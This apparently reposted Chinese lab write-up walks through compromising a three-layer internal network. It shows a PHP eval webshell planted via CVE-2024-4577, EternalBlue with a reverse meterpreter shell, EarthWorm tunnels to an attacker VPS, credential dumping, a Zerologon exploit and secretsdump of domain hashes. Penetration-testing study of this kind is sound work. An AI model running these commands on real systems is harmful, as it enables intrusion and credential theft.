穿透三層內網VPC1

網絡拓撲:

打開入口web服務

信息收集發現漏洞CVE-2024-4577

PHP CGI Windows平臺遠程代碼執行漏洞（CVE-2024-4577）復現_cve-2024-4577漏洞復現-CSDN博客

利用POC：

執行成功，那么直接上傳馬子，注意，這里要找到網站的根目錄才能上傳成功,這里直接百度

<?php file_put_contents('..\htdocs\1.php','<?php eval($_POST["x"]);?>');?>

成功上傳，直接用哥斯拉連接

成功命令執行，并且發現2.0網段

先上線CS

正好是administrator權限，不需要再次提權

之前發現有2.0網段，這里進行主機探測和端口掃描

這里直接發現另外兩臺主機和相關端口

這里主機2.1發現開了445，這里驗證是否有永恒之藍漏洞可以直接打

果然有

這里CS會話遞交到MSF

這里注意先建立路由，使能連通內網機器2.1

run post/multi/manage/autoroute
run autoroute -p

利用永恒之藍：

因為這里2.1機器有防火墻，使該機器反向連接上線

這里2.140機器是出網web服務機器的另一張網卡

use exploit/windows/smb/ms17_010_eternalblue  # 使用該模塊
set payload windows/x64/meterpreter/reverse_tcp   # 在當前模塊設置一個payload,端口為該模塊提供端口
set rhost 192.168.2.1   # 設置目標主機
set lhost 192.168.2.140   # 設置監聽主機
set lport 1236
use exploit/multi/handler #回到exploit/multi/handler 模塊,設置監聽器以接受目標主機反向連接
set lhost 192.168.2.140  # 設置監聽主機
set lport 1236      
use exploit/windows/smb/ms17_010_eternalblue  # 回到exploit/windows/smb/ms17_010_eternalblue模塊
run

成功上線

這里再上線CS，因為處于內網，這里使用中轉上線

將馬子上傳目標機器

upload /root/Desktop/test2.exe C:/

執行上線

成功上線，這里進行信息收集，發現這臺機器只處于2.0網段

結合之前信息收集，這里還有一臺2.7的機器，那么下一步思路很明顯橫向移動

這里進行抓密碼

抓不到？可能權限太高，這里進程注入降權至administrator權限

再次抓取密碼，成功

猜測2.7機器也是使用同一密碼，這里嘗試pxesec橫向

成功上線，這里查看網段，發現一3.0網段

主機發現和端口探測，這里上傳了fscan 來單個掃描3.12主機

發現一個weblogic服務，并且開放445端口，這里先嘗試是否有永恒之藍漏洞

很遺憾，并沒有

因為內網的web服務，使用ew工具進行代理轉發

根據網絡拓撲分析，這里使用二層的正向代理

首先在VPS機器上設置轉接隧道：

./ew_for_linux64 -s rcsocks -l 1080 -e 8888

在出網web服務器上監聽本機9999端口，并將9999端口接收到的代理流量，轉發給攻擊者的公網vps的8888端口：

ew_for_Win.exe -s lcx_tran -l 9999 -f VPS_IP -g 8888

在被控主機2.7機器啟動SOCKS v5代理服務端，并反彈到出網web服務器的8888端口?

ew_for_Win.exe -s rssocks -d 被控主機1IP -e 9999

代理成功

這里在物理機再建立一個全局代理

訪問3.12機器web服務，成功訪問

因為是weblogic框架，那漏掃器掃一下

注入內存馬

哥斯拉連接

上傳馬子上線CS

進行信息收集，發現一個10.0網段

主機發現和端口探測，發現10.10和10.12機器

試一下10和12機器是否存在永恒之藍

都不存在，好吧

嘗試抓密碼橫向

抓到明文，對方機器可能存在防火墻，那么這里不能再用反向上線，建立一個正向TCP監聽直接正向上線

信息收集發現12機器有域并且只在10.0網段

查找域控制器

正好是10.10這臺機器，，這里嘗試了抓取明文密碼橫向沒有成功，

另一種思路查看域控是否存在CVE-2020-1472，這個洞常在域控出現

設置socks代理，kali執行exp:

proxychains4 python3 cve-2020-1472-exploit.py dc 192.168.10.10

抓取管理員hash

proxychains4 python3 secretsdump.py dc\$@192.168.10.10 -just-dc -no-pass

得到管理員hash，直接PTH橫向DC

成功上線

至此測試完成

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/news/900973.shtml
繁體地址，請注明出處：http://hk.pswp.cn/news/900973.shtml
英文地址，請注明出處：http://en.pswp.cn/news/900973.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！